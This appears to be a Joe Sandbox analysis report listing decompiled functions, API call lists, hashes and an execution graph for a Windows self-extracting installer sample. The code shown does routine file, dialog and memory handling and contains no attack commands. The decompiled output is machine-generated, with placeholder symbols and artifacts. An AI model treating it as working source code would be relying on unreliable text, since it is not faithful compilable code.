							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00021680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x291e0; // 0x2a58e90
						 *(_t34 + 4) = _t11;
						 *0x291e0 = _t34;
						return 1;
					}
					_t25 =  *0x28584; // 0x0
					E000244B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x28584; // 0x0
				E000244B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                                                                0x000247e8
                                                                                                                                                                                                                                                0x000247f0
                                                                                                                                                                                                                                                0x000247f4
                                                                                                                                                                                                                                                0x0002480f
                                                                                                                                                                                                                                                0x00024811
                                                                                                                                                                                                                                                0x00024814
                                                                                                                                                                                                                                                0x00024814
                                                                                                                                                                                                                                                0x00024816
                                                                                                                                                                                                                                                0x00024817
                                                                                                                                                                                                                                                0x00024829
                                                                                                                                                                                                                                                0x0002482b
                                                                                                                                                                                                                                                0x0002482f
                                                                                                                                                                                                                                                0x0002484f
                                                                                                                                                                                                                                                0x00024852
                                                                                                                                                                                                                                                0x00024855
                                                                                                                                                                                                                                                0x00024855
                                                                                                                                                                                                                                                0x00024857
                                                                                                                                                                                                                                                0x00024858
                                                                                                                                                                                                                                                0x00024860
                                                                                                                                                                                                                                                0x00024865
                                                                                                                                                                                                                                                0x0002486a
                                                                                                                                                                                                                                                0x0002486f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024876
                                                                                                                                                                                                                                                0x00024831
                                                                                                                                                                                                                                                0x00024841
                                                                                                                                                                                                                                                0x00024847
                                                                                                                                                                                                                                                0x0002480b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002480b
                                                                                                                                                                                                                                                0x000247f6
                                                                                                                                                                                                                                                0x00024806
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00024E6F), ref: 000247EA
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00024823
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00024847
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00024851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                • API String ID: 359063898-1116576409
                                                                                                                                                                                                                                                • Opcode ID: 8be00deb16e29d6bd5de00b708311ee51454de7fedfd675cd6c102dcced12717
                                                                                                                                                                                                                                                • Instruction ID: 2485ed4c61b4e3bfb677bc2c15c359963d02ffe4c068e793ad29ee0a3e25d882
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8be00deb16e29d6bd5de00b708311ee51454de7fedfd675cd6c102dcced12717
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9911C2796046516FE7649F24AC58FBA3B9AEBC5310F248519EE829B241DE398C078760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00026517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00026517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x29a3c; // 0x20000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E000244B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                                                                0x0002651f
                                                                                                                                                                                                                                                0x0002652a
                                                                                                                                                                                                                                                0x00026534
                                                                                                                                                                                                                                                0x0002656b
                                                                                                                                                                                                                                                0x00026577
                                                                                                                                                                                                                                                0x0002657c
                                                                                                                                                                                                                                                0x00026536
                                                                                                                                                                                                                                                0x0002653e
                                                                                                                                                                                                                                                0x00026542
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026544
                                                                                                                                                                                                                                                0x00026547
                                                                                                                                                                                                                                                0x0002654c
                                                                                                                                                                                                                                                0x00026549
                                                                                                                                                                                                                                                0x00026549
                                                                                                                                                                                                                                                0x00026549
                                                                                                                                                                                                                                                0x0002655e
                                                                                                                                                                                                                                                0x00026560
                                                                                                                                                                                                                                                0x00026569
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026569
                                                                                                                                                                                                                                                0x00026542
                                                                                                                                                                                                                                                0x00026587

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00020000,000007D6,00000005), ref: 0002652A
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00020000,00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00026538
                                                                                                                                                                                                                                                • DialogBoxIndirectParamA.USER32(00020000,00000000,00000547,000219E0,00000000), ref: 00026557
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00026560
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1214682469-0
                                                                                                                                                                                                                                                • Opcode ID: 9a1ea02a4ef8b35aed26424b500584e521fe0cf5b27c5784f3231c9c44f97145
                                                                                                                                                                                                                                                • Instruction ID: 71e34c3f5079d4fc1e559a3d9a0949586ea99a6ab6b5e8dc0ff99aa7c5ec654f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a1ea02a4ef8b35aed26424b500584e521fe0cf5b27c5784f3231c9c44f97145
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1001D672600A35BBEB205F69AC48DBB7AACEB86761F100125FE1093150DB76CD5186B1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00023680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00023680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                                                                0x0002368c
                                                                                                                                                                                                                                                0x0002368f
                                                                                                                                                                                                                                                0x00023691
                                                                                                                                                                                                                                                0x0002369f
                                                                                                                                                                                                                                                0x000236a7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000236ba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000236bc
                                                                                                                                                                                                                                                0x000236bc
                                                                                                                                                                                                                                                0x000236c0
                                                                                                                                                                                                                                                0x000236cb
                                                                                                                                                                                                                                                0x000236c2
                                                                                                                                                                                                                                                0x000236c4
                                                                                                                                                                                                                                                0x000236c4
                                                                                                                                                                                                                                                0x000236da
                                                                                                                                                                                                                                                0x000236e0
                                                                                                                                                                                                                                                0x000236e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000236e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000236ba
                                                                                                                                                                                                                                                0x000236ed

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0002369F
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000236B2
                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 000236CB
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000236DA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2776232527-0
                                                                                                                                                                                                                                                • Opcode ID: d735d2b6b24874dc86b3c1acb7eb35c356d51ccba1b68cb5e88d4db39b757c78
                                                                                                                                                                                                                                                • Instruction ID: 326b81f2f7dcb7cd13250b7e29d7ccffa37caf562e43ec44c294f2d87492e3c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d735d2b6b24874dc86b3c1acb7eb35c356d51ccba1b68cb5e88d4db39b757c78
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3701A772A002247BDB304BA66C4CFEF76BCEBC6B20F104119F905E2180D978C651C671
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000265E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                			E000265E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                                                                0x000265e8
                                                                                                                                                                                                                                                0x000265ed
                                                                                                                                                                                                                                                0x000265ef
                                                                                                                                                                                                                                                0x000265f2
                                                                                                                                                                                                                                                0x000265f4
                                                                                                                                                                                                                                                0x000265f4
                                                                                                                                                                                                                                                0x000265f6
                                                                                                                                                                                                                                                0x000265f7
                                                                                                                                                                                                                                                0x00026608
                                                                                                                                                                                                                                                0x00026611
                                                                                                                                                                                                                                                0x00026618
                                                                                                                                                                                                                                                0x0002661c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002660e
                                                                                                                                                                                                                                                0x00026623
                                                                                                                                                                                                                                                0x00026625
                                                                                                                                                                                                                                                0x0002663b
                                                                                                                                                                                                                                                0x0002663b
                                                                                                                                                                                                                                                0x0002663d
                                                                                                                                                                                                                                                0x00026641
                                                                                                                                                                                                                                                0x00026610
                                                                                                                                                                                                                                                0x00026610
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026610
                                                                                                                                                                                                                                                0x00026644
                                                                                                                                                                                                                                                0x00026647
                                                                                                                                                                                                                                                0x00026647
                                                                                                                                                                                                                                                0x00026621
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00022B33), ref: 00026602
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00026612
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00026629
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 00026635
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3260447230-0
                                                                                                                                                                                                                                                • Opcode ID: 3526fcec7a91ee86cf7a60169fdc6e6335f8293e0a7f32a496dde07d3b5a2942
                                                                                                                                                                                                                                                • Instruction ID: 4f36fffadbe9d13c90a3a6f60cf33b1af3e96c52f8d4e49bfbc403ffb42b2af0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3526fcec7a91ee86cf7a60169fdc6e6335f8293e0a7f32a496dde07d3b5a2942
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97F028321045606FE7321B28AC8C8BBBFDCDF8B364F2901AFE89582101DA1B0D078661
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000269B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000269B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x281f8 = E00026C70();
				__set_app_type(E00026FBE(2));
				 *0x288a4 =  *0x288a4 | 0xffffffff;
				 *0x288a8 =  *0x288a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x28528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x2851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00027000();
				if( *0x28000 == 0) {
					__setusermatherr(E00027000);
				}
				E000271EF(_t6);
				return 0;
			}








                                                                                                                                                                                                                                                0x000269b7
                                                                                                                                                                                                                                                0x000269c2
                                                                                                                                                                                                                                                0x000269c8
                                                                                                                                                                                                                                                0x000269cf
                                                                                                                                                                                                                                                0x000269d8
                                                                                                                                                                                                                                                0x000269de
                                                                                                                                                                                                                                                0x000269e4
                                                                                                                                                                                                                                                0x000269e6
                                                                                                                                                                                                                                                0x000269ec
                                                                                                                                                                                                                                                0x000269f2
                                                                                                                                                                                                                                                0x000269f4
                                                                                                                                                                                                                                                0x00026a00
                                                                                                                                                                                                                                                0x00026a07
                                                                                                                                                                                                                                                0x00026a0d
                                                                                                                                                                                                                                                0x00026a0e
                                                                                                                                                                                                                                                0x00026a15

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00026FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00026FC5
                                                                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 000269C2
                                                                                                                                                                                                                                                • __p__fmode.MSVCRT ref: 000269D8
                                                                                                                                                                                                                                                • __p__commode.MSVCRT ref: 000269E6
                                                                                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 00026A07
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1632413811-0
                                                                                                                                                                                                                                                • Opcode ID: c2d7606680b0beebe40ed236f3a7b64c2737192dadabff6307dca9e3cb6e9b24
                                                                                                                                                                                                                                                • Instruction ID: 277bb148d8d637fcfd48c74297674237892e018e934d3bb8aa685bb17f4fcf10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d7606680b0beebe40ed236f3a7b64c2737192dadabff6307dca9e3cb6e9b24
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13F0F87860A311CFE778AB38FD4A7047BA5FB05331B308619E865862E1CF3E855A8B11
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:28.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:961
                                                                                                                                                                                                                                                Total number of Limit Nodes:24
                                                                                                                                                                                                                                                execution_graph 2196 104ad0 2204 103680 2196->2204 2199 104ae9 2200 104aee WriteFile 2201 104b14 2200->2201 2202 104b0f 2200->2202 2201->2202 2203 104b3b SendDlgItemMessageA 2201->2203 2203->2202 2205 103691 MsgWaitForMultipleObjects 2204->2205 2206 1036e8 2205->2206 2207 1036a9 PeekMessageA 2205->2207 2206->2199 2206->2200 2207->2205 2208 1036bc 2207->2208 2208->2205 2208->2206 2209 1036c7 DispatchMessageA 2208->2209 2210 1036d1 PeekMessageA 2208->2210 2209->2210 2210->2208 2211 104cd0 2212 104cf4 2211->2212 2214 104d0b 2211->2214 2213 104d02 2212->2213 2215 104b60 FindCloseChangeNotification 2212->2215 2268 106ce0 2213->2268 2214->2213 2217 104dcb 2214->2217 2220 104d25 2214->2220 2215->2213 2218 104dd4 SetDlgItemTextA 2217->2218 2221 104de3 2217->2221 2218->2221 2219 104e95 2220->2213 2234 104c37 2220->2234 2221->2213 2242 10476d 2221->2242 2224 104e38 2224->2213 2251 104980 2224->2251 2230 104e64 2259 1047e0 LocalAlloc 2230->2259 2233 104e6f 2233->2213 2235 104c4c DosDateTimeToFileTime 2234->2235 2236 104c88 2234->2236 2235->2236 2237 104c5e LocalFileTimeToFileTime 2235->2237 2236->2213 2239 104b60 2236->2239 2237->2236 2238 104c70 SetFileTime 2237->2238 2238->2236 2240 104b92 FindCloseChangeNotification 2239->2240 2241 104b76 SetFileAttributesA 2239->2241 2240->2241 2241->2213 2273 1066ae GetFileAttributesA 2242->2273 2244 10477b 2244->2224 2245 1047cc SetFileAttributesA 2246 1047db 2245->2246 2246->2224 2250 1047c2 2250->2245 2252 104990 2251->2252 2253 1049c2 lstrcmpA 2252->2253 2254 1049a5 2252->2254 2256 1049ba 2253->2256 2257 104a0e 2253->2257 2255 1044b9 20 API calls 2254->2255 2255->2256 2256->2213 2256->2230 2257->2256 2339 10487a 2257->2339 2260 1047f6 2259->2260 2261 10480f LocalAlloc 2259->2261 2262 1044b9 20 API calls 2260->2262 2264 104831 2261->2264 2267 10480b 2261->2267 2262->2267 2265 1044b9 20 API calls 2264->2265 2266 104846 LocalFree 2265->2266 2266->2267 2267->2233 2269 106ce8 2268->2269 2270 106ceb 2268->2270 2269->2219 2352 106cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2270->2352 2272 106e26 2272->2219 2274 104777 2273->2274 2274->2244 2274->2245 2275 106517 FindResourceA 2274->2275 2276 106536 LoadResource 2275->2276 2277 10656b 2275->2277 2276->2277 2278 106544 DialogBoxIndirectParamA FreeResource 2276->2278 2282 1044b9 2277->2282 2278->2277 2281 1047b1 2278->2281 2281->2245 2281->2246 2281->2250 2283 10455a 2282->2283 2284 1044fe LoadStringA 2282->2284 2288 106ce0 4 API calls 2283->2288 2285 104562 2284->2285 2286 104527 2284->2286 2291 1045c9 2285->2291 2298 10457e 2285->2298 2287 10681f 10 API calls 2286->2287 2290 10452c 2287->2290 2289 104689 2288->2289 2289->2281 2292 104536 MessageBoxA 2290->2292 2323 1067c9 2290->2323 2294 104607 LocalAlloc 2291->2294 2295 1045cd LocalAlloc 2291->2295 2292->2283 2294->2283 2297 1045c4 2294->2297 2295->2283 2302 1045f3 2295->2302 2300 10462d MessageBeep 2297->2300 2298->2298 2301 104596 LocalAlloc 2298->2301 2311 10681f 2300->2311 2301->2283 2305 1045af 2301->2305 2303 10171e _vsnprintf 2302->2303 2303->2297 2329 10171e 2305->2329 2308 104645 MessageBoxA LocalFree 2308->2283 2309 1067c9 EnumResourceLanguagesA 2309->2308 2312 106940 2311->2312 2313 106857 GetVersionExA 2311->2313 2314 106ce0 4 API calls 2312->2314 2315 10691a 2313->2315 2316 10687c 2313->2316 2317 10463b 2314->2317 2315->2312 2316->2315 2318 1068a5 GetSystemMetrics 2316->2318 2317->2308 2317->2309 2318->2315 2319 1068b5 RegOpenKeyExA 2318->2319 2319->2315 2320 1068d6 RegQueryValueExA RegCloseKey 2319->2320 2320->2315 2321 10690c 2320->2321 2333 1066f9 2321->2333 2324 1067e2 2323->2324 2325 106803 2323->2325 2337 106793 EnumResourceLanguagesA 2324->2337 2325->2292 2327 1067f5 2327->2325 2338 106793 EnumResourceLanguagesA 2327->2338 2330 10172d 2329->2330 2331 10175d 2330->2331 2332 10173d _vsnprintf 2330->2332 2331->2297 2332->2331 2334 10670f 2333->2334 2335 106740 CharNextA 2334->2335 2336 10674b 2334->2336 2335->2334 2336->2315 2337->2327 2338->2325 2340 1048a2 CreateFileA 2339->2340 2342 104908 2340->2342 2343 1048e9 2340->2343 2342->2256 2343->2342 2344 1048ee 2343->2344 2347 10490c 2344->2347 2348 1048f5 CreateFileA 2347->2348 2349 104917 2347->2349 2348->2342 2349->2348 2350 104962 CharNextA 2349->2350 2351 104953 CreateDirectoryA 2349->2351 2350->2349 2351->2350 2352->2272 3119 103210 3120 103227 3119->3120 3121 10328e EndDialog 3119->3121 3122 1033e2 GetDesktopWindow 3120->3122 3123 103235 3120->3123 3137 103239 3121->3137 3172 1043d0 6 API calls 3122->3172 3127 10324c 3123->3127 3128 1032dd GetDlgItemTextA 3123->3128 3123->3137 3131 103251 3127->3131 3132 1032c5 EndDialog 3127->3132 3130 103366 3128->3130 3138 1032fc 3128->3138 3129 10341f GetDlgItem EnableWindow 3129->3137 3136 1044b9 20 API calls 3130->3136 3133 10325c LoadStringA 3131->3133 3131->3137 3132->3137 3134 103294 3133->3134 3135 10327b 3133->3135 3157 104224 LoadLibraryA 3134->3157 3141 1044b9 20 API calls 3135->3141 3136->3137 3138->3130 3140 103331 GetFileAttributesA 3138->3140 3143 10337c 3140->3143 3144 10333f 3140->3144 3141->3121 3146 10658a CharPrevA 3143->3146 3147 1044b9 20 API calls 3144->3147 3145 1032a5 SetDlgItemTextA 3145->3135 3145->3137 3148 10338d 3146->3148 3149 103351 3147->3149 3150 1058c8 27 API calls 3148->3150 3149->3137 3151 10335a CreateDirectoryA 3149->3151 3152 103394 3150->3152 3151->3130 3151->3143 3152->3130 3153 1033a4 3152->3153 3154 1033c7 EndDialog 3153->3154 3155 10597d 34 API calls 3153->3155 3154->3137 3156 1033c3 3155->3156 3156->3137 3156->3154 3158 1043b2 3157->3158 3159 104246 GetProcAddress 3157->3159 3163 1044b9 20 API calls 3158->3163 3160 1043a4 FreeLibrary 3159->3160 3161 10425d GetProcAddress 3159->3161 3160->3158 3161->3160 3162 104274 GetProcAddress 3161->3162 3162->3160 3164 10428b 3162->3164 3165 10329d 3163->3165 3166 104295 GetTempPathA 3164->3166 3171 1042e1 3164->3171 3165->3137 3165->3145 3167 1042ad 3166->3167 3167->3167 3168 1042b4 CharPrevA 3167->3168 3169 1042d0 CharPrevA 3168->3169 3168->3171 3169->3171 3170 104390 FreeLibrary 3170->3165 3171->3170 3174 104463 SetWindowPos 3172->3174 3175 106ce0 4 API calls 3174->3175 3176 1033f1 SetWindowTextA SendDlgItemMessageA 3175->3176 3176->3129 3176->3137 3177 104a50 3178 104a9f ReadFile 3177->3178 3179 104a66 3177->3179 3181 104abb 3178->3181 3180 104a82 memcpy 3179->3180 3179->3181 3180->3181 3182 103450 3183 1034d3 EndDialog 3182->3183 3184 10345e 3182->3184 3185 10346a 3183->3185 3186 103465 3184->3186 3187 10349a GetDesktopWindow 3184->3187 3186->3185 3190 10348c EndDialog 3186->3190 3188 1043d0 11 API calls 3187->3188 3189 1034ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3188->3189 3189->3185 3190->3185 2353 106f40 SetUnhandledExceptionFilter 2354 104cc0 GlobalFree 3191 104200 3192 10420b SendMessageA 3191->3192 3193 10421e 3191->3193 3192->3193 3194 103100 3195 1031b0 3194->3195 3196 103111 3194->3196 3197 1031b9 SendDlgItemMessageA 3195->3197 3198 103141 3195->3198 3199 103149 GetDesktopWindow 3196->3199 3202 